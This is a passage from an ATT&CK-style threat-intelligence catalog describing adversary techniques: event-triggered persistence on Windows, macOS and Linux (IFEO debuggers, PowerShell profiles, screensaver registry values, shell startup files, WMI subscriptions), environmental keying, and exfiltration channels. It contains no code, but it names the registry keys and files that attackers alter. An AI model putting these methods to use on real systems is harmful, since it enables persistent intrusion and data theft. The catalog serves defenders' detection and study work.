Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at <code>/sbin/emond</code> will load any rules from the <code>/etc/emond.d/rules/</code> directory and take action once an explicitly defined event takes place.

The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27) configuration file at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.<sup>[[xorrior emond Jan 2018](https://app.tidalcyber.com/references/b49649ec-28f0-4d30-ab6c-13b12fca36e8)]</sup><sup>[[magnusviri emond Apr 2016](https://app.tidalcyber.com/references/373f64a5-a30f-4b6e-b352-d0c6f8b65fdb)]</sup><sup>[[sentinelone macos persist Jun 2019](https://app.tidalcyber.com/references/81a49043-cac5-40e0-a626-fd242d21c56d)]</sup>

Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.<sup>[[xorrior emond Jan 2018](https://app.tidalcyber.com/references/b49649ec-28f0-4d30-ab6c-13b12fca36e8)]</sup><sup>[[magnusviri emond Apr 2016](https://app.tidalcyber.com/references/373f64a5-a30f-4b6e-b352-d0c6f8b65fdb)]</sup><sup>[[sentinelone macos persist Jun 2019](https://app.tidalcyber.com/references/81a49043-cac5-40e0-a626-fd242d21c56d)]</sup> Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27) service.

The tag is: misp-galaxy:technique="Emond"

Image File Execution Options Injection

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g notepad.exe</code>). <sup>[[Microsoft Dev Blog IFEO Mar 2010](https://app.tidalcyber.com/references/4c62c2cb-bee2-4fc0-aa81-65d66e71a5c2)]</sup>

IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. <sup>[[Microsoft GFlags Mar 2017](https://app.tidalcyber.com/references/9c11c382-b420-4cf9-9db2-eaa7b60aee2d)]</sup> IFEOs are represented as <code>Debugger</code> values in the Registry under <code>HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<executable></code> where <code><executable></code> is the binary on which the debugger is attached. <sup>[[Microsoft Dev Blog IFEO Mar 2010](https://app.tidalcyber.com/references/4c62c2cb-bee2-4fc0-aa81-65d66e71a5c2)]</sup>

IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). <sup>[[Microsoft Silent Process Exit NOV 2017](https://app.tidalcyber.com/references/86896031-f654-4185-ba45-8c931903153b)]</sup> <sup>[[Oddvar Moe IFEO APR 2018](https://app.tidalcyber.com/references/8661b51c-ddb7-484f-919d-22079c39d1e4)]</sup> Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\</code>. <sup>[[Microsoft Silent Process Exit NOV 2017](https://app.tidalcyber.com/references/86896031-f654-4185-ba45-8c931903153b)]</sup> <sup>[[Oddvar Moe IFEO APR 2018](https://app.tidalcyber.com/references/8661b51c-ddb7-484f-919d-22079c39d1e4)]</sup>

Similar to [Accessibility Features](https://app.tidalcyber.com/technique/9ed0f5c3-49ff-4c43-bb77-c00e466ce3ba), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://app.tidalcyber.com/technique/f5fb86b6-abf0-4d44-b4a0-56f0636c24d2) will cause the "debugger" program to be executed with SYSTEM privileges. <sup>[[Tilbury 2014](https://app.tidalcyber.com/references/136325ee-0712-49dd-b3ab-a6f2bfb218b0)]</sup>

Similar to [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. <sup>[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]</sup> Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.

Malware may also use IFEO to [Impair Defenses](https://app.tidalcyber.com/technique/e3be3d76-0a36-4060-8003-3b39c557f728) by registering invalid debuggers that redirect and effectively disable various system and security applications. <sup>[[FSecure Hupigon](https://app.tidalcyber.com/references/08ceb57f-065e-45e9-98e9-d58a92caa755)]</sup> <sup>[[Symantec Ushedix June 2008](https://app.tidalcyber.com/references/9df2b407-df20-403b-ba1b-a681b9c74c7e)]</sup>

The tag is: misp-galaxy:technique="Image File Execution Options Injection"

Installer Packages

Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.<sup>[[Installer Package Scripting Rich Trouton](https://app.tidalcyber.com/references/7a877b67-ac4b-4d82-860a-75b5f0b8daae)]</sup>

Using legitimate applications, adversaries have distributed applications with modified installer scripts to execute malicious content. When a user installs the application, they may be required to grant administrative permissions to allow the installation. At the end of the installation process of the legitimate application, content such as macOS postinstall scripts can be executed with the inherited elevated permissions. Adversaries can use these scripts to execute a malicious executable or install other malicious components (such as a [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27)) with the elevated permissions.<sup>[[Application Bundle Manipulation Brandon Dalton](https://app.tidalcyber.com/references/2a8fd573-6ab0-403b-b813-88d9d3edab36)]</sup><sup>[[wardle evilquest parti](https://app.tidalcyber.com/references/1ebd91db-9b56-442f-bb61-9e154b5966ac)]</sup>

Depending on the distribution, Linux versions of package installer scripts are sometimes called maintainer scripts or post installation scripts. These scripts can include preinst, postinst, prerm, postrm scripts and run as root when executed.

For Windows, the Microsoft Installer services uses .msi files to manage the installing, updating, and uninstalling of applications. Adversaries have leveraged Prebuild and Postbuild events to run commands before or after a build when installing .msi files.<sup>[[Windows AppleJeus GReAT](https://app.tidalcyber.com/references/336ea5f5-d8cc-4af5-9aa0-203e319b3c28)]</sup><sup>[[Debian Manual Maintainer Scripts](https://app.tidalcyber.com/references/e32e293a-f583-494e-9eb5-c82167f2e000)]</sup>

The tag is: misp-galaxy:technique="Installer Packages"

LC_LOAD_DYLIB Addition

Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.<sup>[[Writing Bad Malware for OSX](https://app.tidalcyber.com/references/5628ecd9-48da-4a50-94ba-4b70abe56089)]</sup> There are tools available to perform these changes.

Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.<sup>[[Malware Persistence on OS X](https://app.tidalcyber.com/references/d4e3b066-c439-4284-ba28-3b8bd8ec270e)]</sup>

The tag is: misp-galaxy:technique="LC_LOAD_DYLIB Addition"

Netsh Helper DLL

Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.<sup>[[TechNet Netsh](https://app.tidalcyber.com/references/58112a3a-06bd-4a46-8a09-4dba5f42a04f)]</sup> The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>.

Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.<sup>[[Github Netsh Helper CS Beacon](https://app.tidalcyber.com/references/c3169722-9c32-4a38-a7fe-8d4b6e51ca36)]</sup><sup>[[Demaske Netsh Persistence](https://app.tidalcyber.com/references/663b3fd6-0dd6-45c8-afba-dc0ea6d331b5)]</sup>

The tag is: misp-galaxy:technique="Netsh Helper DLL"

PowerShell Profile

Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile (<code>profile.ps1</code>) is a script that runs when [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) starts and can be used as a logon script to customize user environments.

[PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) supports several profiles depending on the user or host program. For example, there can be different profiles for [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. <sup>[[Microsoft About Profiles](https://app.tidalcyber.com/references/1da63665-7a96-4bc3-9606-a3575b913819)]</sup>

Adversaries may modify these profiles to include arbitrary commands, functions, modules, and/or [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) drives to gain persistence. Every time a user opens a [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) session the modified script will be executed unless the <code>-NoProfile</code> flag is used when it is launched. <sup>[[ESET Turla PowerShell May 2019](https://app.tidalcyber.com/references/68c0f34b-691a-4847-8d49-f18b7f4e5188)]</sup>

An adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. <sup>[[Wits End and Shady PowerShell Profiles](https://app.tidalcyber.com/references/8fcbd99a-1fb8-4ca3-9efd-a98734d4397d)]</sup>

The tag is: misp-galaxy:technique="PowerShell Profile"

Screensaver

Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.<sup>[[Wikipedia Screensaver](https://app.tidalcyber.com/references/b5d69465-27df-4acc-b6cc-f51be8780b7b)]</sup> The Windows screensaver application scrnsave.scr is located in <code>C:\Windows\System32\</code>, and <code>C:\Windows\sysWOW64\</code> on 64-bit Windows systems, along with screensavers included with base Windows installations.

The following screensaver settings are stored in the Registry (<code>HKCU\Control Panel\Desktop\</code>) and could be manipulated to achieve persistence:

  • <code>SCRNSAVE.exe</code> - set to malicious PE path

  • <code>ScreenSaveActive</code> - set to '1' to enable the screensaver

  • <code>ScreenSaverIsSecure</code> - set to '0' to not require a password to unlock

  • <code>ScreenSaveTimeout</code> - sets user inactivity timeout before screensaver is executed

Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity.<sup>[[ESET Gazer Aug 2017](https://app.tidalcyber.com/references/9d1c40af-d4bc-4d4a-b667-a17378942685)]</sup>

The tag is: misp-galaxy:technique="Screensaver"

Trap

Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>.

Adversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format <code>trap 'command list' signals</code> where "command list" will be executed when "signals" are received.<sup>[[Trap Manual](https://app.tidalcyber.com/references/143462e1-b7e8-4e18-9cb1-6f4f3969e891)]</sup><sup>[[Cyberciti Trap Statements](https://app.tidalcyber.com/references/24cf5471-f327-4407-b32f-055537f3495e)]</sup>

The tag is: misp-galaxy:technique="Trap"

Unix Shell Configuration Modification

Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User [Unix Shell](https://app.tidalcyber.com/technique/3eafcd8b-0cb8-4d23-8785-3f80a3c897c7)s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (<code>/etc</code>) and the user’s home directory (<code>~/</code>) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.

Adversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the <code>/etc/profile</code> and <code>/etc/profile.d</code> files.<sup>[[intezer-kaiji-malware](https://app.tidalcyber.com/references/ef1fbb40-da6f-41d0-a44a-9ff444e2ad89)]</sup><sup>[[bencane blog bashrc](https://app.tidalcyber.com/references/503a4cd6-5cfe-4cce-b363-0cf3c8bc9feb)]</sup> These files typically require root permissions to modify and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into <code>~/.bash_profile</code>, <code>~/.bash_login</code>, or <code>~/.profile</code> which are sourced when a user opens a command-line interface or connects remotely.<sup>[[anomali-rocke-tactics](https://app.tidalcyber.com/references/2308c5ca-04a4-43c5-b92b-ffa6a60ae3a9)]</sup><sup>[[Linux manual bash invocation](https://app.tidalcyber.com/references/06185cbd-6635-46c7-9783-67bd8742b66f)]</sup> Since the system only executes the first existing file in the listed order, adversaries have used <code>~/.bash_profile</code> to ensure execution. Adversaries have also leveraged the <code>~/.bashrc</code> file which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface.<sup>[[Tsunami](https://app.tidalcyber.com/references/95b5b03e-f160-47cf-920c-8f4f3d4114a3)]</sup><sup>[[anomali-rocke-tactics](https://app.tidalcyber.com/references/2308c5ca-04a4-43c5-b92b-ffa6a60ae3a9)]</sup><sup>[[anomali-linux-rabbit](https://app.tidalcyber.com/references/ec413dc7-028c-4153-9e98-abe85961747f)]</sup><sup>[[Magento](https://app.tidalcyber.com/references/b8b3f360-e14c-49ea-a4e5-8d6d9727e731)]</sup> Some malware targets the termination of a program to trigger execution, adversaries can use the <code>~/.bash_logout</code> file to execute malicious commands at the end of a session.

For macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using <code>/etc/profile</code>, <code>/etc/zshenv</code>, <code>/etc/zprofile</code>, and <code>/etc/zlogin</code>.<sup>[[ScriptingOSX zsh](https://app.tidalcyber.com/references/08b390aa-863b-420e-9b00-e168e3c756d8)]</sup><sup>[[PersistentJXA_leopitt](https://app.tidalcyber.com/references/2d66932e-1b73-4255-a9a8-ea8effb3a776)]</sup><sup>[[code_persistence_zsh](https://app.tidalcyber.com/references/b76d3ed0-e484-4ed1-aa6b-892a6f34e478)]</sup><sup>[[macOS MS office sandbox escape](https://app.tidalcyber.com/references/759e81c1-a250-440e-8b52-178bcf5451b9)]</sup> The login shell then configures the user environment with <code>~/.zprofile</code> and <code>~/.zlogin</code>. The interactive shell uses the <code>~/.zshrc</code> to configure the user environment. Upon exiting, <code>/etc/zlogout</code> and <code>~/.zlogout</code> are executed. For legacy programs, macOS executes <code>/etc/bashrc</code> on startup.

The tag is: misp-galaxy:technique="Unix Shell Configuration Modification"

Windows Management Instrumentation Event Subscription

Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer’s uptime.<sup>[[Mandiant M-Trends 2015](https://app.tidalcyber.com/references/067497eb-17d9-465f-a070-495575f420d7)]</sup>

Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.<sup>[[FireEye WMI SANS 2015](https://app.tidalcyber.com/references/a9333ef5-5637-4a4c-9aaf-fdc9daf8b860)]</sup><sup>[[FireEye WMI 2015](https://app.tidalcyber.com/references/135ccd72-2714-4453-9c8f-f5fde31905ee)]</sup> Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription.<sup>[[Dell WMI Persistence](https://app.tidalcyber.com/references/a88dd548-ac8f-4297-9e23-de2643294846)]</sup><sup>[[Microsoft MOF May 2018](https://app.tidalcyber.com/references/1d1da9ad-c995-4040-8103-b51af9d8bac3)]</sup>

WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.

The tag is: misp-galaxy:technique="Windows Management Instrumentation Event Subscription"

Event Triggered Execution

Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Cloud environments may also support various functions and services that monitor and can be invoked in response to specific cloud events.<sup>[[Backdooring an AWS account](https://app.tidalcyber.com/references/2c867527-1584-44f7-b5e5-8ca54ea79619)]</sup><sup>[[Varonis Power Automate Data Exfiltration](https://app.tidalcyber.com/references/16436468-1daf-433d-bb3b-f842119594b4)]</sup><sup>[[Microsoft DART Case Report 001](https://app.tidalcyber.com/references/bd8c6a86-1a63-49cd-a97f-3d119e4223d4)]</sup>

Adversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.<sup>[[FireEye WMI 2015](https://app.tidalcyber.com/references/135ccd72-2714-4453-9c8f-f5fde31905ee)]</sup><sup>[[Malware Persistence on OS X](https://app.tidalcyber.com/references/d4e3b066-c439-4284-ba28-3b8bd8ec270e)]</sup><sup>[[amnesia malware](https://app.tidalcyber.com/references/489a6c57-f64c-423b-a7bd-169fa36c4cdf)]</sup>

Since the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges.

The tag is: misp-galaxy:technique="Event Triggered Execution"

Environmental Keying

Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://app.tidalcyber.com/technique/aca9cbac-5c11-4050-8d9c-2a947c89a1e8) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.<sup>[[EK Clueless Agents](https://app.tidalcyber.com/references/ef7409d2-af39-4ad8-8469-76f0165687bd)]</sup>

Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.<sup>[[Kaspersky Gauss Whitepaper](https://app.tidalcyber.com/references/4bf39390-f3ca-4132-841e-b35abefe7dee)]</sup><sup>[[Proofpoint Router Malvertising](https://app.tidalcyber.com/references/b964139f-7c02-451d-8d22-a87975e60aa2)]</sup><sup>[[EK Impeding Malware Analysis](https://app.tidalcyber.com/references/c3e6c8da-1399-419c-96f5-7dade6fccd29)]</sup><sup>[[Environmental Keyed HTA](https://app.tidalcyber.com/references/b16bae1a-75aa-478b-b8c7-458ee5a3f7e5)]</sup><sup>[[Ebowla: Genetic Malware](https://app.tidalcyber.com/references/8c65dbc1-33ad-470c-b172-7497c6fd2480)]</sup> By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.<sup>[[Kaspersky Gauss Whitepaper](https://app.tidalcyber.com/references/4bf39390-f3ca-4132-841e-b35abefe7dee)]</sup><sup>[[Ebowla: Genetic Malware](https://app.tidalcyber.com/references/8c65dbc1-33ad-470c-b172-7497c6fd2480)]</sup> These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).

Similar to [Obfuscated Files or Information](https://app.tidalcyber.com/technique/046cc07e-8700-4536-9c5b-6ecb384f52b0), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.<sup>[[Kaspersky Gauss Whitepaper](https://app.tidalcyber.com/references/4bf39390-f3ca-4132-841e-b35abefe7dee)]</sup><sup>[[EK Impeding Malware Analysis](https://app.tidalcyber.com/references/c3e6c8da-1399-419c-96f5-7dade6fccd29)]</sup><sup>[[Environmental Keyed HTA](https://app.tidalcyber.com/references/b16bae1a-75aa-478b-b8c7-458ee5a3f7e5)]</sup><sup>[[Ebowla: Genetic Malware](https://app.tidalcyber.com/references/8c65dbc1-33ad-470c-b172-7497c6fd2480)]</sup><sup>[[Demiguise Guardrail Router Logo](https://app.tidalcyber.com/references/2e55d33a-fe75-4397-b6f0-a28d397b4c24)]</sup> By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.<sup>[[Kaspersky Gauss Whitepaper](https://app.tidalcyber.com/references/4bf39390-f3ca-4132-841e-b35abefe7dee)]</sup> This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.

Like other [Execution Guardrails](https://app.tidalcyber.com/technique/aca9cbac-5c11-4050-8d9c-2a947c89a1e8), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8). While use of [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.

The tag is: misp-galaxy:technique="Environmental Keying"

Execution Guardrails

Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.<sup>[[FireEye Kevin Mandia Guardrails](https://app.tidalcyber.com/references/0c518eec-a94e-42a7-8eb7-527ae3e279b6)]</sup> Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.<sup>[[FireEye Outlook Dec 2019](https://app.tidalcyber.com/references/f23a773f-9c50-4193-877d-97f7c13f48f1)]</sup>

Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8). While use of [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.

The tag is: misp-galaxy:technique="Execution Guardrails"

Exfiltration Over Asymmetric Encrypted Non-C2 Protocol

Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Asymmetric encryption algorithms are those that use different keys on each end of the channel. Also known as public-key cryptography, this requires pairs of cryptographic keys that can encrypt/decrypt data from the corresponding key. Each end of the communication channels requires a private key (only in the procession of that entity) and the public key of the other entity. The public keys of each entity are exchanged before encrypted communications begin.

Network protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are baked into a protocol.

The tag is: misp-galaxy:technique="Exfiltration Over Asymmetric Encrypted Non-C2 Protocol"

Exfiltration Over Symmetric Encrypted Non-C2 Protocol

Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Symmetric encryption algorithms are those that use shared or the same keys/secrets on each end of the channel. This requires an exchange or pre-arranged agreement/possession of the value used to encrypt and decrypt data.

Network protocols that use asymmetric encryption often utilize symmetric encryption once keys are exchanged, but adversaries may opt to manually share keys and implement symmetric cryptographic algorithms (ex: RC4, AES) vice using mechanisms that are baked into a protocol. This may result in multiple layers of encryption (in protocols that are natively encrypted such as HTTPS) or encryption in protocols that not typically encrypted (such as HTTP or FTP).

The tag is: misp-galaxy:technique="Exfiltration Over Symmetric Encrypted Non-C2 Protocol"

Exfiltration Over Unencrypted Non-C2 Protocol

Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.<sup>[[copy_cmd_cisco](https://app.tidalcyber.com/references/88138372-550f-5da5-be5e-b5ba0fe32f64)]</sup>

Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields.

The tag is: misp-galaxy:technique="Exfiltration Over Unencrypted Non-C2 Protocol"

Exfiltration Over Alternative Protocol

Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Adversaries may also opt to encrypt and/or obfuscate these alternate channels.

[Exfiltration Over Alternative Protocol](https://app.tidalcyber.com/technique/192d25ea-bae1-48e4-88de-e0acd481ab88) can be done using various common operating system utilities such as [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc)/SMB or FTP.<sup>[[Palo Alto OilRig Oct 2016](https://app.tidalcyber.com/references/14bbb07b-caeb-4d17-8e54-047322a5930c)]</sup> On macOS and Linux <code>curl</code> may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.<sup>[[20 macOS Common Tools and Techniques](https://app.tidalcyber.com/references/3ee99ff4-daf4-4776-9d94-f7cf193c2b0c)]</sup>

Many IaaS and SaaS platforms (such as Microsoft Exchange, Microsoft SharePoint, GitHub, and AWS S3) support the direct download of files, emails, source code, and other sensitive information via the web console or [Cloud API](https://app.tidalcyber.com/technique/af798e80-2cc5-5452-83e4-9560f08bf2d5).

The tag is: misp-galaxy:technique="Exfiltration Over Alternative Protocol"

Exfiltration Over C2 Channel

Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.

The tag is: misp-galaxy:technique="Exfiltration Over C2 Channel"

Exfiltration Over Bluetooth

Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.

Adversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.

The tag is: misp-galaxy:technique="Exfiltration Over Bluetooth"

Exfiltration Over Other Network Medium

Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel.

Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.

The tag is: misp-galaxy:technique="Exfiltration Over Other Network Medium"

Exfiltration over USB

Adversaries may attempt to exfiltrate data over a USB connected physical device. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a USB device introduced by a user. The USB device could be used as the final exfiltration point or to hop between otherwise disconnected systems.

The tag is: misp-galaxy:technique="Exfiltration over USB"

Exfiltration Over Physical Medium

Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems.

The tag is: misp-galaxy:technique="Exfiltration Over Physical Medium"

Exfiltration Over Webhook

Adversaries may exfiltrate data to a webhook endpoint rather than over their primary command and control channel. Webhooks are simple mechanisms for allowing a server to push data over HTTP/S to a client without the need for the client to continuously poll the server.<sup>[[RedHat Webhooks](https://app.tidalcyber.com/references/37321591-40fd-537e-ba74-71042bc5064e)]</sup> Many public and commercial services, such as Discord, Slack, and webhook.site, support the creation of webhook endpoints that can be used by other services, such as Github, Jira, or Trello.<sup>[[Discord Intro to Webhooks](https://app.tidalcyber.com/references/bf5b3773-29cc-539a-a0f0-a6d1d63dee2d)]</sup> When changes happen in the linked services (such as pushing a repository update or modifying a ticket), these services will automatically post the data to the webhook endpoint for use by the consuming application.

